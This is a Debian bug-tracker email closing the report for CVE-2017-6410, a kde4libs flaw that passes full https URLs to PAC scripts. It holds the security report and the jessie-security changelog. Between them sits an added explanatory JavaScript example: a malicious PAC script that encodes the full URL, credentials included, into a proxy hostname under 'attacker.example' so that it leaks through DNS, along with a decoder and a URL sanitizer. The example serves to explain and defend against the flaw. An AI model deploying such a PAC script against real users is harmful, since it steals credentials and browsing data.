Your message dated Sat, 27 May 2017 12:32:43 +0000
with message-id <e1deatf-000iwx...@fasolo.debian.org>
and subject line Bug#856890: fixed in kde4libs 4:4.14.2-5+deb8u2
has caused the Debian Bug report #856890,
regarding kde4libs: CVE-2017-6410: Information Leak when accessing https when
using a malicious PAC file
to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)
--
856890: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=856890
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Source: kde4libs
Version: 4:4.14.26-1
Severity: important
Tags: upstream patch security
Hi,
the following vulnerability was published for kde4libs.
CVE-2017-6410[0]:
| kpac/script.cpp in KDE kio before 5.32 and kdelibs before 4.14.30 calls
| the PAC FindProxyForURL function with a full https URL (potentially
| including Basic Authentication credentials, a query string, or
| PATH_INFO), which allows remote attackers to obtain sensitive
| information via a crafted PAC file.
If you fix the vulnerability please also make sure to include the
CVE (Common Vulnerabilities & Exposures) id in your changelog entry.
For further information see:
[0] https://security-tracker.debian.org/tracker/CVE-2017-6410
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6410
[1] https://commits.kde.org/kdelibs/1804c2fde7bf4e432c6cf5bb8cce5701c7010559
[2] https://www.kde.org/info/security/advisory-20170228-1.txt
Please adjust the affected versions in the BTS as needed.
Regards,
Salvatore
--- End Message ---
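The CVE text above describes the mechanism: the PAC script's FindProxyForURL gets the complete https URL, so a script served by an attacker (via a captive portal, a rogue WPAD answer or a hostile proxy-config URL) can encode credentials, query strings and paths into the proxy hostname it returns and read them back from the resulting DNS lookups. The following is an added example, not kdelibs/kio code, that shows the leak end to end in plain JavaScript and a sanitizer in the spirit of the changelog's "Sanitize URLs before passing them to FindProxyForURL". The sanitising policy (drop credentials for every scheme; for https also drop path, query and fragment) is an assumption chosen for the illustration and not necessarily identical to the upstream patch; "attacker.example" and "bank.example" are placeholders, and the PAC script is constructed for this example.

```javascript
// Added example (not kdelibs/kio code): what a PAC script can see, and a sanitizer.

// A constructed malicious PAC script. It hex-encodes whatever URL it is handed
// into the proxy hostname it returns; resolving that name sends the encoded URL
// to the attacker's authoritative DNS server. A real script would split the
// payload into 63-byte labels; "attacker.example" is a placeholder.
const MALICIOUS_PAC = `
  function FindProxyForURL(url, host) {
    var leak = "";
    for (var i = 0; i < url.length; i++) {
      leak += url.charCodeAt(i).toString(16);
    }
    return "PROXY " + leak + ".attacker.example:8080";
  }
`;

// Evaluate a PAC script and return its FindProxyForURL function.
// Real clients run PAC in an embedded JS engine (KJS in kdelibs); a plain
// Function constructor is enough here to show what the script receives.
function loadPac(source) {
  return new Function(source + "\n return FindProxyForURL;")();
}

// Sanitizer (assumed policy): credentials never reach the script, and for https
// everything after the host is dropped as well, because path, query and fragment
// are encrypted on the wire and a proxy decision cannot legitimately depend on
// them. http URLs keep path and query, since scripts do route on those.
function sanitizeForPac(rawUrl) {
  const u = new URL(rawUrl);
  u.username = "";
  u.password = "";
  u.hash = "";
  if (u.protocol === "https:") {
    u.pathname = "/";
    u.search = "";
  }
  return u.href;
}

// Decode the hostname the malicious script produced, i.e. recover what the
// attacker would learn from the DNS query. Returns the leaked URL string.
function recoverLeak(proxyDirective) {
  const hex = proxyDirective.replace(/^PROXY /, "").split(".")[0];
  let out = "";
  for (let i = 0; i < hex.length; i += 2) {
    out += String.fromCharCode(parseInt(hex.slice(i, i + 2), 16));
  }
  return out;
}

// Run the malicious script against a URL, with or without sanitisation, and
// return the URL the attacker ends up seeing.
function leakedUrl(rawUrl, sanitize) {
  const pac = loadPac(MALICIOUS_PAC);
  const host = new URL(rawUrl).hostname;
  const passed = sanitize ? sanitizeForPac(rawUrl) : rawUrl;
  return recoverLeak(pac(passed, host));
}

// Stand-alone demonstration.
const sample = "https://alice:s3cret@bank.example/account?id=42";
console.log("unsanitized:", leakedUrl(sample, false));
console.log("sanitized:  ", leakedUrl(sample, true));
```

Two points worth checking in any client that consumes PAC files: the script must never receive userinfo for any scheme, and for https it should see nothing beyond scheme, host and port. The sanitizer is deliberately applied before the URL reaches the script rather than by trusting the script to behave, because the script is the untrusted input.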
--- Begin Message ---
Source: kde4libs
Source-Version: 4:4.14.2-5+deb8u2
We believe that the bug you reported is fixed in the latest version of
kde4libs, which is due to be installed in the Debian FTP archive.
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to 856...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Salvatore Bonaccorso <car...@debian.org> (supplier of updated kde4libs package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@ftp-master.debian.org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
Format: 1.8
Date: Thu, 11 May 2017 14:33:29 +0200
Source: kde4libs
Binary: libkdecore5 libkdeui5 libkpty4 libkdesu5 libkjsapi4 libkjsembed4
libkio5 libkntlm4 libsolid4 libkde3support4 libkfile4 libknewstuff2-4
libknewstuff3-4 libkparts4 libkutils4 libthreadweaver4 libkhtml5 libkimproxy4
libkmediaplayer4 libktexteditor4 libknotifyconfig4 libkdnssd4 libkrosscore4
libkrossui4 libnepomuk4 libnepomukutils4 libnepomukquery4a libplasma3
libkunitconversion4 libkdewebkit5 libkcmutils4 libkemoticons4 libkidletime4
libkprintutils4 libkdeclarative5 kdelibs-bin kdelibs5-plugins kdelibs5-data
kdoctools kdelibs5-dev kdelibs5-dbg
Architecture: all source
Version: 4:4.14.2-5+deb8u2
Distribution: jessie-security
Urgency: high
Maintainer: Debian Qt/KDE Maintainers <debian-qt-kde@lists.debian.org>
Changed-By: Salvatore Bonaccorso <car...@debian.org>
Closes: 856890
Description:
kdelibs-bin - core executables for KDE Applications
kdelibs5-data - core shared data for all KDE Applications
kdelibs5-dbg - debugging symbols for the KDE Development Platform libraries
kdelibs5-dev - development files for the KDE Development Platform libraries
kdelibs5-plugins - core plugins for KDE Applications
kdoctools - various tools for accessing application documentation
libkcmutils4 - utility classes for using KCM modules
libkde3support4 - KDE 3 Support Library for the KDE 4 Platform
libkdeclarative5 - declarative library for plasma
libkdecore5 - KDE Platform Core Library
libkdesu5 - Console-mode Authentication Library for the KDE Platform
libkdeui5 - KDE Platform User Interface Library
libkdewebkit5 - KDE WebKit Library
libkdnssd4 - DNS-SD Protocol Library for the KDE Platform
libkemoticons4 - utility classes to deal with emoticon themes
libkfile4 - File Selection Dialog Library for KDE Platform
libkhtml5 - KHTML Web Content Rendering Engine
libkidletime4 - library to provide information about idle time
libkimproxy4 - Instant Messaging Interface Library for the KDE Platform
libkio5 - Network-enabled File Management Library for the KDE Platform
libkjsapi4 - KJS API Library for the KDE Development Platform
libkjsembed4 - library for binding JavaScript objects to QObjects
libkmediaplayer4 - KMediaPlayer Interface for the KDE Platform
libknewstuff2-4 - "Get Hot New Stuff" v2 Library for the KDE Platform
libknewstuff3-4 - "Get Hot New Stuff" v3 Library for the KDE Platform
libknotifyconfig4 - library for configuring KDE Notifications
libkntlm4 - NTLM Authentication Library for the KDE Platform
libkparts4 - Framework for the KDE Platform Graphical Components
libkprintutils4 - utility classes to deal with printing
libkpty4 - Pseudo Terminal Library for the KDE Platform
libkrosscore4 - Kross Core Library
libkrossui4 - Kross UI Library
libktexteditor4 - KTextEditor interfaces for the KDE Platform
libkunitconversion4 - Unit Conversion library for the KDE Platform
libkutils4 - dummy transitional library
libnepomuk4 - Nepomuk Meta Data Library
libnepomukquery4a - Nepomuk Query Library for the KDE Platform
libnepomukutils4 - Nepomuk Utility Library
libplasma3 - Plasma Library for the KDE Platform
libsolid4 - Solid Library for KDE Platform
libthreadweaver4 - ThreadWeaver Library for the KDE Platform
Changes:
kde4libs (4:4.14.2-5+deb8u2) jessie-security; urgency=high
.
* Non-maintainer upload by the Security Team.
* Sanitize URLs before passing them to FindProxyForURL (CVE-2017-6410)
(Closes: #856890)
* Verify that whoever is calling us is actually who he says he is
(CVE-2017-8422)
Checksums-Sha1:
0d32cae05c12fcfd598ef4d9fe40d56c8d89ffa4 5726 kde4libs_4.14.2-5+deb8u2.dsc
b251f27ef28bb30c694ad6d6bfaaeaeef75c1c26 265480 kde4libs_4.14.2-5+deb8u2.debian.tar.xz
fe575ae783525a393143669c167164603268db89 2921952 kdelibs5-data_4.14.2-5+deb8u2_all.deb
Checksums-Sha256:
cd12d53e00d42dcf000b06a057db7cb9732ded45712904f4310b78061f41b56c 5726 kde4libs_4.14.2-5+deb8u2.dsc
513a39e79e73a508de4a2f21174703838524ac68bc22a4bb629c363cf4460b91 265480 kde4libs_4.14.2-5+deb8u2.debian.tar.xz
d3a24df4d837c8d022cfc66b6785fc3744d2339c1532c559971324d0e236b98f 2921952 kdelibs5-data_4.14.2-5+deb8u2_all.deb
Files:
6fc64c2c240b582b34caf35714e0a33d 5726 libs optional kde4libs_4.14.2-5+deb8u2.dsc
70b3a9ef4a23bea28624b93899c3cfae 265480 libs optional kde4libs_4.14.2-5+deb8u2.debian.tar.xz
1072e7d27b9ccf1ee814f0b0de1a66ec 2921952 libs optional kdelibs5-data_4.14.2-5+deb8u2_all.deb
-----BEGIN PGP SIGNATURE-----
-----END PGP SIGNATURE-----
--- End Message ---